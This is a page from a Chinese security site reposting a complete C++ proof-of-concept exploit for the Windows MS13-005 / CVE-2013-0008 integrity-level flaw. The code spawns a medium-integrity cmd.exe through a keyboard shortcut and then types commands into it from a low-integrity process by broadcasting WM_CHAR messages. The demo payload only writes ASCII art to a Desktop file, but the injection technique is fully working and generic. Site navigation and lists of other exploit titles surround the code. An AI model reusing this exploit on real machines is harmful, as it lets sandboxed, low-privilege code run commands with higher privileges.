首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS13-005 HWND_BROADCAST PoC
来源:http://www.twitter.com/0vercl0k 作者:0vercl0k 发布时间:2013-02-18  
/*
    ms13-005-funz-poc.cpp - Drive a Medium IL cmd.exe via a Low IL
process and message broadcasted
    Copyright (C) 2013 Axel "0vercl0k" Souchet - http://www.twitter.com/0vercl0k
 
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
 
    @taviso did all the job, I just followed its blogpost:
      -> http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html
-- amazing.
 
    Cool trick:
      -> If you want to set this process to a low IL you can use:
      icacls ms13-005-funz-poc.exe /setintegritylevel L
      -> The new ms13-005-funz-poc.exe will be now launched as low IL
(you can check it with process explorer)
 
    # Exploit Title: ms13-005-funz-poc.cpp
    # Date: 2013-02-05
    # Exploit Author: 0vercl0k - https://twitter.com/0vercl0k
    # Vendor Homepage: https://www.microsoft.com/
    # Version: Windows Vista, Windows Server 2008, Windows 7, Windows
Server 2008 r2, Windows 8, Windows Server 2012, Windows RT (See
http://technet.microsoft.com/fr-fr/security/bulletin/ms13-005)
    # Tested on: Windows 7
    # CVE : CVE-2013-0008 -
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0008
    # Video: http://0vercl0k.tuxfamily.org/bl0g/ms13-005-funz/ms13-005-funz-poc.mp4
*/
 
#include <windows.h>
#include <stdio.h>
 
int main()
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    PCHAR payload[] = {
        "echo \".___   _____    ______________ ______________   \">
%USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"|   | /     \\   \\__    ___/   |   \\_   _____/
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"|   |/  \\ /  \\    |    | /    ~    \\    __)_
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"|   /    Y    \\   |    | \\    Y    /        \\
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"|___\\____|__  /   |____|  \\___|_  /_______  /   \">>
%USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"           \\/                  \\/        \\/
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" _______  .___  ________  ________    _____     \">>
%USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" \\      \\ |   |/  _____/ /  _____/   /  _  \\
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" /   |   \\|   /   \\  ___/   \\  ___  /  /_\\  \\
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"/    |    \\   \\    \\_\\  \\    \\_\\  \\/    |
\\  \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"\\____|__  /___|\\______  /\\______  /\\____|__  /
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"       \\/            \\/        \\/         \\/
\">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "exit",
        NULL
    };
 
    printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy
? Press to continue\n");
    getchar();
 
    si.cb = sizeof(si);
    CreateProcess(
        NULL,
        "cmd.exe",
        NULL,
        NULL,
        TRUE,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi
    );
 
    Sleep(1000);
 
    // Yeah, you can "bruteforce" the index of the window..
    printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..");
    keybd_event(VK_LWIN, 0x5B, 0, 0);
    keybd_event(VK_LSHIFT, 0xAA, 0, 0);
    keybd_event(0x37, 0x87, 0, 0);
 
    keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);
    keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);
    keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);
 
    Sleep(1000);
    printf("3] Killing now the useless low IL cmd.exe..\n");
 
    TerminateProcess(
        pi.hProcess,
        1337
    );
 
    printf("4] Now driving the medium IL cmd.exe with SendMessage and
HWND_BROADCAST (WM_CHAR)\n");
    printf("   \"Drive the command prompt [..] to make it look like a
scene from a Hollywood movie.\" <- That's what we're going to do!\n");
 
    for(unsigned int i = 0; payload[i] != NULL; ++i)
    {
        for(unsigned int j = 0; j < strlen(payload[i]); ++j)
        {
            // Yeah, that's the fun part to watch ;D
            Sleep(10);
            SendMessage(
                HWND_BROADCAST,
                WM_CHAR,
                payload[i][j],
                0
            );
        }
 
        SendMessage(
            HWND_BROADCAST,
            WM_CHAR,
            VK_RETURN,
            0
        );
    }
 
    return EXIT_SUCCESS;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Schneider Electric Accutech Ma
·Novell GroupWise Client gwcls1
·Microsoft Wuindows Movie Maker
·Polycom HDX Telnet Authorizati
·Google Chrome Silent HTTP Auth
·iRobosoft Internet Browser Mem
·FreeFloat FTP 1.0 Raw Commands
·Foxit Reader Plugin URL Proces
·Windows Media Player 9.0.0 .wa
·Microsoft Internet Explorer SL
·Schneider Electric Accutech Ma
·EChat Server 3.1 BoF-0day
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved